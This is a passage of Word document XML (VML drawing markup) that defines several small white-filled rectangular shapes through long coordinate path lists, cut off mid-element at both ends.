1,7738,13840,7738,13838,7738,13837,7738,13836,7738,13834,7738,13833,7738,13831,7738,13830,7738,13828,7738,13827,7738,13825,7738,13823,7738,13821,7738,13819,7738,13817,7738,13815,7738,13813,7738,13811,7738,13809,7738,13807,7738,13804,7738,13802,7738,13800,7738,13797,7738,13795,7738,13792,7738,13789,7738,13786,7738,13783,7738,13781,7738,13778,7738,13774,7738,13771,7738,13768,7738,13765,7738,13761,7738,13758,7738,13754,7738,13751,7738,13747,7738,13743,7738,13739,7738,13735,7738,13731,7738,13727,7738,13723,7738,13718,7738,13714,7738,13710,7738,13705,7738,13700,7738,13696,7738,13691,7738,13686,7738,13681,7738,13676,7738,13670,7738,13665,7738,13659,7738,13654,7738,13648,7738,13643,7738,13637,7738,13631,7738,13625,7738,13619,7738,13612,7738,13606e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:409.500pt;margin-top:679.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8190,13590" coordsize="130,270">
        <v:shape style="position:absolute;left:8190;top:13590;width:130;height:270" coordorigin="8190,13590" coordsize="130,270" path="m8218,13606l8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8218,13606,8219,13606,8219,13606,8219,13606,8219,13606,8219,13606,8219,13606,8219,13606,8219,13606,8219,13606,8220,13606,8220,13606,8220,13606,8220,13606,8220,13606,8220,13606,8221,13606,8221,13606,8221,13606,8221,13606,8222,13606,8222,13606,8222,13606,8223,13606,8223,13606,8223,13606,8224,13606,8224,13606,8225,13606,8225,13606,8226,13606,8226,13606,8227,13606,8227,13606,8228,13606,8228,13606,8229,13606,8229,13606,8230,13606,8231,13606,8231,13606,8232,13606,8233,13606,8234,13606,8234,13606,8235,13606,8236,13606,8237,13606,8238,13606,8239,13606,8240,13606,8241,13606,8242,13606,8243,13606,8244,13606,8245,13606,8246,13606,8247,13606,8248,13606,8249,13606,8251,13606,8252,13606,8253,13606,8255,13606,8256,13606,8257,13606,8259,13606,8260,13606,8262,13606,8263,13606,8265,13606,8267,13606,8268,13606,8270,13606,8272,13606,8274,13606,8275,13606,8277,13606,8279,13606,8281,13606,8283,13606,8285,13606,8287,13606,8289,13606,8292,13606,8294,13606,8296,13606,8298,13606,8301,13606,8303,13606,8305,13606,8308,13606,8310,13606,8313,13606,8316,13606,8318,13606,8321,13606,8324,13606,8326,13606,8329,13606,8332,13606,8335,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13606,8338,13607,8338,13607,8338,13607,8338,13607,8338,13607,8338,13607,8338,13608,8338,13608,8338,13608,8338,13609,8338,13609,8338,13609,8338,13610,8338,13610,8338,13610,8338,13611,8338,13611,8338,13612,8338,13612,8338,13613,8338,13614,8338,13614,8338,13615,8338,13616,8338,13616,8338,13617,8338,13618,8338,13619,8338,13620,8338,13621,8338,13622,8338,13623,8338,13624,8338,13625,8338,13626,8338,13627,8338,13628,8338,13630,8338,13631,8338,13632,8338,13634,8338,13635,8338,13637,8338,13639,8338,13640,8338,13642,8338,13644,8338,13646,8338,13647,8338,13649,8338,13651,8338,13653,8338,13656,8338,13658,8338,13660,8338,13662,8338,13665,8338,13667,8338,13670,8338,13672,8338,13675,8338,13678,8338,13680,8338,13683,8338,13686,8338,13689,8338,13692,8338,13696,8338,13699,8338,13702,8338,13706,8338,13709,8338,13713,8338,13716,8338,13720,8338,13724,8338,13728,8338,13732,8338,13736,8338,13740,8338,13744,8338,13748,8338,13753,8338,13757,8338,13762,8338,13767,8338,13771,8338,13776,8338,13781,8338,13786,8338,13791,8338,13797,8338,13802,8338,13807,8338,13813,8338,13819,8338,13824,8338,13830,8338,13836,8338,13842,8338,13848,8338,13855,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8338,13861,8337,13861,8337,13861,8337,13861,8337,13861,8337,13861,8337,13861,8337,13861,8336,13861,8336,13861,8336,13861,8336,13861,8336,13861,8335,13861,8335,13861,8335,13861,8335,13861,8334,13861,8334,13861,8334,13861,8333,13861,8333,13861,8333,13861,8332,13861,8332,13861,8331,13861,8331,13861,8330,13861,8330,13861,8329,13861,8329,13861,8328,13861,8328,13861,8327,13861,8326,13861,8326,13861,8325,13861,8324,13861,8324,13861,8323,13861,8322,13861,8321,13861,8320,13861,8320,13861,8319,13861,8318,13861,8317,13861,8316,13861,8315,13861,8314,13861,8313,13861,8312,13861,8310,13861,8309,13861,8308,13861,8307,13861,8306,13861,8304,13861,8303,13861,8302,13861,8300,13861,8299,13861,8297,13861,8296,13861,8294,13861,8293,13861,8291,13861,8290,13861,8288,13861,8286,13861,8285,13861,8283,13861,8281,13861,8279,13861,8277,13861,8275,13861,8273,13861,8271,13861,8269,13861,8267,13861,8265,13861,8263,13861,8260,13861,8258,13861,8256,13861,8253,13861,8251,13861,8248,13861,8246,13861,8243,13861,8241,13861,8238,13861,8235,13861,8233,13861,8230,13861,8227,13861,8224,13861,8221,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13861,8218,13860,8218,13860,8218,13860,8218,13860,8218,13860,8218,13860,8218,13860,8218,13859,8218,13859,8218,13859,8218,13859,8218,13858,8218,13858,8218,13858,8218,13857,8218,13857,8218,13856,8218,13856,8218,13856,8218,13855,8218,13854,8218,13854,8218,13853,8218,13853,8218,13852,8218,13851,8218,13851,8218,13850,8218,13849,8218,13848,8218,13847,8218,13846,8218,13845,8218,13844,8218,13843,8218,13842,8218,13841,8218,13840,8218,13838,8218,13837,8218,13836,8218,13834,8218,13833,8218,13831,8218,13830,8218,13828,8218,13827,8218,13825,8218,13823,8218,13821,8218,13819,8218,13817,8218,13815,8218,13813,8218,13811,8218,13809,8218,13807,8218,13804,8218,13802,8218,13800,8218,13797,8218,13795,8218,13792,8218,13789,8218,13786,8218,13783,8218,13781,8218,13778,8218,13774,8218,13771,8218,13768,8218,13765,8218,13761,8218,13758,8218,13754,8218,13751,8218,13747,8218,13743,8218,13739,8218,13735,8218,13731,8218,13727,8218,13723,8218,13718,8218,13714,8218,13710,8218,13705,8218,13700,8218,13696,8218,13691,8218,13686,8218,13681,8218,13676,8218,13670,8218,13665,8218,13659,8218,13654,8218,13648,8218,13643,8218,13637,8218,13631,8218,13625,8218,13619,8218,13612,8218,13606e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:481.500pt;margin-top:679.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9630,13590" coordsize="130,270">
        <v:shape style="position:absolute;left:9630;top:13590;width:130;height:270" coordorigin="9630,13590" coordsize="130,270" path="m9659,13606l9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9659,13606,9660,13606,9660,13606,9660,13606,9660,13606,9660,13606,9660,13606,9660,13606,9660,13606,9661,13606,9661,13606,9661,13606,9661,13606,9661,13606,9662,13606,9662,13606,9662,13606,9662,13606,9663,13606,9663,13606,9663,13606,9664,13606,9664,13606,9665,13606,9665,13606,9665,13606,9666,13606,9666,13606,9667,13606,9667,13606,9668,13606,9668,13606,9669,13606,9669,13606,9670,13606,9671,13606,9671,13606,9672,13606,9673,13606,9673,13606,9674,13606,9675,13606,9676,13606,9677,13606,9678,13606,9678,13606,9679,13606,9680,13606,9681,13606,9682,13606,9683,13606,9684,13606,9685,13606,9687,13606,9688,13606,9689,13606,9690,13606,9691,13606,9693,13606,9694,13606,9695,13606,9697,13606,9698,13606,9700,13606,9701,13606,9703,13606,9704,13606,9706,13606,9707,13606,9709,13606,9711,13606,9713,13606,9714,13606,9716,13606,9718,13606,9720,13606,9722,13606,9724,13606,9726,13606,9728,13606,9730,13606,9732,13606,9734,13606,9737,13606,9739,13606,9741,13606,9744,13606,9746,13606,9749,13606,9751,13606,9754,13606,9756,13606,9759,13606,9762,13606,9764,13606,9767,13606,9770,13606,9773,13606,9776,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13606,9779,13607,9779,13607,9779,13607,9779,13607,9779,13607,9779,13607,9779,13608,9779,13608,9779,13608,9779,13609,9779,13609,9779,13609,9779,13610,9779,13610,9779,13610,9779,13611,9779,13611,9779,13612,9779,13612,9779,13613,9779,13614,9779,13614,9779,13615,9779,13616,9779,13616,9779,13617,9779,13618,9779,13619,9779,13620,9779,13621,9779,13622,9779,13623,9779,13624,9779,13625,9779,13626,9779,13627,9779,13628,9779,13630,9779,13631,9779,13632,9779,13634,9779,13635,9779,13637,9779,13639,9779,13640,9779,13642,9779,13644,9779,13646,9779,13647,9779,13649,9779,13651,9779,13653,9779,13656,9779,13658,9779,13660,9779,13662,9779,13665,9779,13667,9779,13670,9779,13672,9779,13675,9779,13678,9779,13680,9779,13683,9779,13686,9779,13689,9779,13692,9779,13696,9779,13699,9779,13702,9779,13706,9779,13709,9779,13713,9779,13716,9779,13720,9779,13724,9779,13728,9779,13732,9779,13736,9779,13740,9779,13744,9779,13748,9779,13753,9779,13757,9779,13762,9779,13767,9779,13771,9779,13776,9779,13781,9779,13786,9779,13791,9779,13797,9779,13802,9779,13807,9779,13813,9779,13819,9779,13824,9779,13830,9779,13836,9779,13842,9779,13848,9779,13855,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9779,13861,9778,13861,9778,13861,9778,13861,9778,13861,9778,13861,9778,13861,9778,13861,9778,13861,9778,13861,9777,13861,9777,13861,9777,13861,9777,13861,9777,13861,9776,13861,9776,13861,9776,13861,9776,13861,9775,13861,9775,13861,9775,13861,9774,13861,9774,13861,9774,13861,9773,13861,9773,13861,9772,13861,9772,13861,9772,13861,9771,13861,9771,13861,9770,13861,9769,13861,9769,13861,9768,13861,9768,13861,9767,13861,9766,13861,9766,13861,9765,13861,9764,13861,9764,13861,9763,13861,9762,13861,9761,13861,9760,13861,9759,13861,9758,13861,9757,13861,9757,13861,9756,13861,9754,13861,9753,13861,9752,13861,9751,13861,9750,13861,9749,13861,9748,13861,9746,13861,9745,13861,9744,13861,9742,13861,9741,13861,9740,13861,9738,13861,9737,13861,9735,13861,9734,13861,9732,13861,9730,13861,9729,13861,9727,13861,9725,13861,9723,13861,9722,13861,9720,13861,9718,13861,9716,13861,9714,13861,9712,13861,9710,13861,9708,13861,9706,13861,9703,13861,9701,13861,9699,13861,9696,13861,9694,13861,9692,13861,9689,13861,9687,13861,9684,13861,9681,13861,9679,13861,9676,13861,9673,13861,9671,13861,9668,13861,9665,13861,9662,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13861,9659,13860,9659,13860,9659,13860,9659,13860,9659,13860,9659,13860,9659,13860,9659,13859,9659,13859,9659,13859,9659,13859,9659,13858,9659,13858,9659,13858,9659,13857,9659,13857,9659,13856,9659,13856,9659,13856,9659,13855,9659,13854,9659,13854,9659,13853,9659,13853,9659,13852,9659,13851,9659,13851,9659,13850,9659,13849,9659,13848,9659,13847,9659,13846,9659,13845,9659,13844,9659,13843,9659,13842,9659,13841,9659,13840,9659,13838,9659,13837,9659,13836,9659,13834,9659,13833,9659,13831,9659,13830,9659,13828,9659,13827,9659,13825,9659,13823,9659,13821,9659,13819,9659,13817,9659,13815,9659,13813,9659,13811,9659,13809,9659,13807,9659,13804,9659,13802,9659,13800,9659,13797,9659,13795,9659,13792,9659,13789,9659,13786,9659,13783,9659,13781,9659,13778,9659,13774,9659,13771,9659,13768,9659,13765,9659,13761,9659,13758,9659,13754,9659,13751,9659,13747,9659,13743,9659,13739,9659,13735,9659,13731,9659,13727,9659,13723,9659,13718,9659,13714,9659,13710,9659,13705,9659,13700,9659,13696,9659,13691,9659,13686,9659,13681,9659,13676,9659,13670,9659,13665,9659,13659,9659,13654,9659,13648,9659,13643,9659,13637,9659,13631,9659,13625,9659,13619,9659,13612,9659,13606e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:145.500pt;margin-top:710.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2910,14210" coordsize="130,270">
        <v:shape style="position:absolute;left:2910;top:14210;width:130;height:270" coordorigin="2910,14210" coordsize="130,270" path="m2935,14236l2935,14236,2935,14236,2935,14236,2935,14236,2935,14236,2935,14236,2935,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2936,14236,2937,14236,2937,14236,2937,14236,2937,14236,2937,14236,2937,14236,2938,14236,2938,14236,2938,14236,2938,14236,2939,14236,2939,14236,2939,14236,2939,14236,2940,14236,2940,14236,2940,14236,2941,14236,2941,14236,2942,14236,2942,14236,2942,14236,2943,14236,2943,14236,2944,14236,2944,14236,2945,14236,2945,14236,2946,14236,2947,14236,2947,14236,2948,14236,2949,14236,2949,14236,2950,14236,2951,14236,2952,14236,2952,14236,2953,14236,2954,14236,2955,14236,2956,14236,2957,14236,2958,14236,2959,14236,2960,14236,2961,14236,2962,14236,2963,14236,2964,14236,2966,14236,2967,14236,2968,14236,2969,14236,2971,14236,2972,14236,2973,14236,2975,14236,2976,14236,2978,14236,2979,14236,2981,14236,2982,14236,2984,14236,2986,14236,2987,14236,2989,14236,2991,14236,2993,14236,2995,14236,2997,14236,2999,14236,3001,14236,3003,14236,3005,14236,3007,14236,3009,14236,3011,14236,3013,14236,3016,14236,3018,14236,3020,14236,3023,14236,3025,14236,3028,14236,3030,14236,3033,14236,3036,14236,3038,14236,3041,14236,3044,14236,3047,14236,3050,14236,3053,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14237,3056,14237,3056,14237,3056,14237,3056,14237,3056,14237,3056,14237,3056,14237,3056,14238,3056,14238,3056,14238,3056,14238,3056,14239,3056,14239,3056,14239,3056,14239,3056,14240,3056,14240,3056,14241,3056,14241,3056,14242,3056,14242,3056,14243,3056,14243,3056,14244,3056,14244,3056,14245,3056,14246,3056,14247,3056,14247,3056,14248,3056,14249,3056,14250,3056,14251,3056,14252,3056,14253,3056,14254,3056,14255,3056,14256,3056,14257,3056,14259,3056,14260,3056,14261,3056,14263,3056,14264,3056,14266,3056,14267,3056,14269,3056,14271,3056,14272,3056,14274,3056,14276,3056,14278,3056,14280,3056,14282,3056,14284,3056,14286,3056,14288,3056,14290,3056,14293,3056,14295,3056,14298,3056,14300,3056,14303,3056,14305,3056,14308,3056,14311,3056,14314,3056,14317,3056,14320,3056,14323,3056,14326,3056,14329,3056,14332,3056,14336,3056,14339,3056,14343,3056,14347,3056,14350,3056,14354,3056,14358,3056,14362,3056,14366,3056,14370,3056,14374,3056,14379,3056,14383,3056,14388,3056,14392,3056,14397,3056,14402,3056,14406,3056,14411,3056,14416,3056,14422,3056,14427,3056,14432,3056,14438,3056,14443,3056,14449,3056,14455,3056,14460,3056,14466,3056,14472,3056,14479,3056,14485,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3055,14491,3054,14491,3054,14491,3054,14491,3054,14491,3054,14491,3054,14491,3053,14491,3053,14491,3053,14491,3053,14491,3052,14491,3052,14491,3052,14491,3052,14491,3051,14491,3051,14491,3051,14491,3050,14491,3050,14491,3049,14491,3049,14491,3049,14491,3048,14491,3048,14491,3047,14491,3047,14491,3046,14491,3046,14491,3045,14491,3044,14491,3044,14491,3043,14491,3042,14491,3042,14491,3041,14491,3040,14491,3039,14491,3039,14491,3038,14491,3037,14491,3036,14491,3035,14491,3034,14491,3033,14491,3032,14491,3031,14491,3030,14491,3029,14491,3028,14491,3027,14491,3025,14491,3024,14491,3023,14491,3022,14491,3020,14491,3019,14491,3018,14491,3016,14491,3015,14491,3013,14491,3012,14491,3010,14491,3009,14491,3007,14491,3005,14491,3004,14491,3002,14491,3000,14491,2998,14491,2996,14491,2994,14491,2993,14491,2991,14491,2988,14491,2986,14491,2984,14491,2982,14491,2980,14491,2978,14491,2975,14491,2973,14491,2971,14491,2968,14491,2966,14491,2963,14491,2961,14491,2958,14491,2955,14491,2953,14491,2950,14491,2947,14491,2944,14491,2941,14491,2938,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14491,2935,14490,2935,14490,2935,14490,2935,14490,2935,14490,2935,14489,2935,14489,2935,14489,2935,14489,2935,14488,2935,14488,2935,14488,2935,14487,2935,14487,2935,14486,2935,14486,2935,14485,2935,14485,2935,14484,2935,14484,2935,14483,2935,14482,2935,14482,2935,14481,2935,14480,2935,14479,2935,14478,2935,14478,2935,14477,2935,14476,2935,14475,2935,14473,2935,14472,2935,14471,2935,14470,2935,14469,2935,14467,2935,14466,2935,14465,2935,14463,2935,14462,2935,14460,2935,14459,2935,14457,2935,14455,2935,14453,2935,14452,2935,14450,2935,14448,2935,14446,2935,14444,2935,14442,2935,14439,2935,14437,2935,14435,2935,14432,2935,14430,2935,14427,2935,14425,2935,14422,2935,14419,2935,14417,2935,14414,2935,14411,2935,14408,2935,14405,2935,14402,2935,14398,2935,14395,2935,14392,2935,14388,2935,14385,2935,14381,2935,14377,2935,14373,2935,14370,2935,14366,2935,14361,2935,14357,2935,14353,2935,14349,2935,14344,2935,14340,2935,14335,2935,14331,2935,14326,2935,14321,2935,14316,2935,14311,2935,14306,2935,14301,2935,14295,2935,14290,2935,14284,2935,14279,2935,14273,2935,14267,2935,14261,2935,14255,2935,14249,2935,14243,2935,14236e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:151.500pt;margin-top:710.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3030,14210" coordsize="130,270">
        <v:shape style="position:absolute;left:3030;top:14210;width:130;height:270" coordorigin="3030,14210" coordsize="130,270" path="m3056,14236l3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3056,14236,3057,14236,3057,14236,3057,14236,3057,14236,3057,14236,3057,14236,3057,14236,3058,14236,3058,14236,3058,14236,3058,14236,3059,14236,3059,14236,3059,14236,3059,14236,3060,14236,3060,14236,3060,14236,3061,14236,3061,14236,3062,14236,3062,14236,3062,14236,3063,14236,3063,14236,3064,14236,3064,14236,3065,14236,3066,14236,3066,14236,3067,14236,3067,14236,3068,14236,3069,14236,3069,14236,3070,14236,3071,14236,3072,14236,3073,14236,3073,14236,3074,14236,3075,14236,3076,14236,3077,14236,3078,14236,3079,14236,3080,14236,3081,14236,3082,14236,3083,14236,3084,14236,3086,14236,3087,14236,3088,14236,3089,14236,3091,14236,3092,14236,3093,14236,3095,14236,3096,14236,3098,14236,3099,14236,3101,14236,3102,14236,3104,14236,3106,14236,3107,14236,3109,14236,3111,14236,3113,14236,3115,14236,3117,14236,3119,14236,3121,14236,3123,14236,3125,14236,3127,14236,3129,14236,3131,14236,3133,14236,3136,14236,3138,14236,3140,14236,3143,14236,3145,14236,3148,14236,3150,14236,3153,14236,3156,14236,3158,14236,3161,14236,3164,14236,3167,14236,3170,14236,3173,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14236,3176,14237,3176,14237,3176,14237,3176,14237,3176,14237,3176,14237,3176,14237,3176,14237,3176,14238,3176,14238,3176,14238,3176,14238,3176,14239,3176,14239,3176,14239,3176,14239,3176,14240,3176,14240,3176,14241,3176,14241,3176,14242,3176,14242,3176,14243,3176,14243,3176,14244,3176,14244,3176,14245,3176,14246,3176,14247,3176,14247,3176,14248,3176,14249,3176,14250,3176,14251,3176,14252,3176,14253,3176,14254,3176,14255,3176,14256,3176,14257,3176,14259,3176,14260,3176,14261,3176,14263,3176,14264,3176,14266,3176,14267,3176,14269,3176,14271,3176,14272,3176,14274,3176,14276,3176,14278,3176,14280,3176,14282,3176,14284,3176,14286,3176,14288,3176,14290,3176,14293,3176,14295,3176,14298,3176,14300,3176,14303,3176,14305,3176,14308,3176,14311,3176,14314,3176,14317,3176,14320,3176,14323,3176,14326,3176,14329,3176,14332,3176,14336,3176,14339,3176,14343,3176,14347,3176,14350,3176,14354,3176,14358,3176,14362,3176,14366,3176,14370,3176,14374,3176,14379,3176,14383,3176,14388,3176,14392,3176,14397,3176,14402,3176,14406,3176,14411,3176,14416,3176,14422,3176,14427,3176,14432,3176,14438,3176,14443,3176,14449,3176,14455,3176,14460,3176,14466,3176,14472,3176,14479,3176,14485,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3176,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3175,14491,3174,14491,3174,14491,3174,14491,3174,14491,3174,14491,3174,14491,3173,14491,3173,14491,3173,14491,3173,14491,3173,14491,3172,14491,3172,14491,3172,14491,3171,14491,3171,14491,3171,14491,3170,14491,3170,14491,3170,14491,3169,14491,3169,14491,3168,14491,3168,14491,3167,14491,3167,14491,3166,14491,3166,14491,3165,14491,3164,14491,3164,14491,3163,14491,3162,14491,3162,14491,3161,14491,3160,14491,3159,14491,3159,14491,3158,14491,3157,14491,3156,14491,3155,14491,3154,14491,3153,14491,3152,14491,3151,14491,3150,14491,3149,14491,3148,14491,3147,14491,3146,14491,3144,14491,3143,14491,3142,14491,3140,14491,3139,14491,3138,14491,3136,14491,3135,14491,3133,14491,3132,14491,3130,14491,3129,14491,3127,14491,3125,14491,3124,14491,3122,14491,3120,14491,3118,14491,3116,14491,3115,14491,3113,14491,3111,14491,3109,14491,3106,14491,3104,14491,3102,14491,3100,14491,3098,14491,3095,14491,3093,14491,3091,14491,3088,14491,3086,14491,3083,14491,3081,14491,3078,14491,3076,14491,3073,14491,3070,14491,3067,14491,3064,14491,3061,14491,3059,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14491,3056,14490,3056,14490,3056,14490,3056,14490,3056,14490,3056,14489,3056,14489,3056,14489,3056,14489,3056,14488,3056,14488,3056,14488,3056,14487,3056,14487,3056,14486,3056,14486,3056,14485,3056,14485,3056,14484,3056,14484,3056,14483,3056,14482,3056,14482,3056,14481,3056,14480,3056,14479,3056,14478,3056,14478,3056,14477,3056,14476,3056,14475,3056,14473,3056,14472,3056,14471,3056,14470,3056,14469,3056,14467,3056,14466,3056,14465,3056,14463,3056,14462,3056,14460,3056,14459,3056,14457,3056,14455,3056,14453,3056,14452,3056,14450,3056,14448,3056,14446,3056,14444,3056,14442,3056,14439,3056,14437,3056,14435,3056,14432,3056,14430,3056,14427,3056,14425,3056,14422,3056,14419,3056,14417,3056,14414,3056,14411,3056,14408,3056,14405,3056,14402,3056,14398,3056,14395,3056,14392,3056,14388,3056,14385,3056,14381,3056,14377,3056,14373,3056,14370,3056,14366,3056,14361,3056,14357,3056,14353,3056,14349,3056,14344,3056,14340,3056,14335,3056,14331,3056,14326,3056,14321,3056,14316,3056,14311,3056,14306,3056,14301,3056,14295,3056,14290,3056,14284,3056,14279,3056,14273,3056,14267,3056,14261,3056,14255,3056,14249,3056,14243,3056,14236e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:205.500pt;margin-top:710.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4110,14210" coordsize="130,270">
        <v:shape style="position:absolute;left:4110;top:14210;width:130;height:270" coordorigin="4110,14210" coordsize="130,270" path="m4136,14236l4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4136,14236,4137,14236,4137,14236,4137,14236,4137,14236,4137,14236,4137,14236,4137,14236,4137,14236,4137,14236,4138,14236,4138,14236,4138,14236,4138,14236,4138,14236,4139,14236,4139,14236,4139,14236,4139,14236,4140,14236,4140,14236,4140,14236,4141,14236,4141,14236,4141,14236,4142,14236,4142,14236,4143,14236,4143,14236,4143,14236,4144,14236,4144,14236,4145,14236,4146,14236,4146,14236,4147,14236,4147,14236,4148,14236,4149,14236,4149,14236,4150,14236,4151,14236,4151,14236,4152,14236,4153,14236,4154,14236,4155,14236,4156,14236,4157,14236,4158,14236,4158,14236,4159,14236,4161,14236,4162,14236,4163,14236,4164,14236,4165,14236,4166,14236,4167,14236,4169,14236,4170,14236,4171,14236,4173,14236,4174,14236,4175,14236,4177,14236,4178,14236,4180,14236,4181,14236,4183,14236,4185,14236,4186,14236,4188,14236,4190,14236,4192,14236,4193,14236,4195,14236,4197,14236,4199,14236,4201,14236,4203,14236,4205,14236,4207,14236,4209,14236,4212,14236,4214,14236,4216,14236,4219,14236,4221,14236,4223,14236,4226,14236,4228,14236,4231,14236,4234,14236,4236,14236,4239,14236,4242,14236,4244,14236,4247,14236,4250,14236,4253,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14236,4256,14237,4256,14237,4256,14237,4256,14237,4256,14237,4256,14237,4256,14237,4256,14237,4256,14238,4256,14238,4256,14238,4256,14238,4256,14239,4256,14239,4256,14239,4256,14239,4256,14240,4256,14240,4256,14241,4256,14241,4256,14242,4256,14242,4256,14243,4256,14243,4256,14244,4256,14244,4256,14245,4256,14246,4256,14247,4256,14247,4256,14248,4256,14249,4256,14250,4256,14251,4256,14252,4256,14253,4256,14254,4256,14255,4256,14256,4256,14257,4256,14259,4256,14260,4256,14261,4256,14263,4256,14264,4256,14266,4256,14267,4256,14269,4256,14271,4256,14272,4256,14274,4256,14276,4256,14278,4256,14280,4256,14282,4256,14284,4256,14286,4256,14288,4256,14290,4256,14293,4256,14295,4256,14298,4256,14300,4256,14303,4256,14305,4256,14308,4256,14311,4256,14314,4256,14317,4256,14320,4256,14323,4256,14326,4256,14329,4256,14332,4256,14336,4256,14339,4256,14343,4256,14347,4256,14350,4256,14354,4256,14358,4256,14362,4256,14366,4256,14370,4256,14374,4256,14379,4256,14383,4256,14388,4256,14392,4256,14397,4256,14402,4256,14406,4256,14411,4256,14416,4256,14422,4256,14427,4256,14432,4256,14438,4256,14443,4256,14449,4256,14455,4256,14460,4256,14466,4256,14472,4256,14479,4256,14485,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4256,14491,4255,14491,4255,14491,4255,14491,4255,14491,4255,14491,4255,14491,4255,14491,4255,14491,4254,14491,4254,14491,4254,14491,4254,14491,4254,14491,4253,14491,4253,14491,4253,14491,4253,14491,4252,14491,4252,14491,4252,14491,4251,14491,4251,14491,4250,14491,4250,14491,4250,14491,4249,14491,4249,14491,4248,14491,4248,14491,4247,14491,4247,14491,4246,14491,4246,14491,4245,14491,4244,14491,4244,14491,4243,14491,4242,14491,4242,14491,4241,14491,4240,14491,4239,14491,4238,14491,4237,14491,4237,14491,4236,14491,4235,14491,4234,14491,4233,14491,4232,14491,4231,14491,4230,14491,4228